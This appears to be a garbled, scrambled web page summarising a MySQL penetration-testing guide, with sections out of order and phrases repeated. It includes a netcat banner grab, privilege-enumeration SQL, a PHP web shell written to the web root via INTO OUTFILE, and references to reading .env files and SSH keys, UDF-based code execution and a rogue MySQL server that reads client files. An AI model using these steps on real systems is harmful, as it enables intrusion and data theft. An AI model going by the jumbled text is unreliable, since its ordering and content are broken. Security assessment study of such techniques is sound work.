If Nmap is unavailable, a simple Netcat connection will trigger the MySQL server to send its greeting banner, exposing the version string: nc -nv 3306 Use code with caution. 2. Authentication Bypasses and Misconfigurations
-- Check global privileges for the current user SELECT * FROM information_schema.user_privileges WHERE grantee LIKE "'user'%"; -- Determine if the user has the crucial SUPER or FILE privilege SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'FILE'; Use code with caution. 5. File System Interaction and Local File Inclusion (LFI)
This is often blocked in modern configurations, but it is a "first-check" priority for sensitive data like .env files or SSH keys. Writing Files (INTO OUTFILE)
Before you can check a database, you must find it. This step is called scanning. mysql hacktricks verified
: Detailed payloads for Union-based, Error-based, and Blind SQL injection to extract data.
Web applications should never connect to the database using administrative accounts. Create dedicated users with permissions restricted strictly to the required databases and tables, completely disabling global file privileges.
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; If Nmap is unavailable, a simple Netcat connection
Execute these standard queries to understand your privileges and the underlying operating system context:
The HackTricks MySQL Pentesting Guide provides a comprehensive methodology for identifying, enumerating, and exploiting MySQL services. The following sections detail the core techniques for interacting with MySQL as part of a security assessment. 1. External Enumeration & Connection
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. 6. Privilege Escalation and RCE via UDFs This step is called scanning
This is a goldmine for hacktricks users – it bypasses all file restrictions.
This is a classic but often overlooked. If you can trick an admin or app server into connecting to your malicious MySQL server, you can read arbitrary files from the client.
If successful, this loop breaks and grants an interactive MySQL shell as the root user. Empty Root Passwords and Anonymous Accounts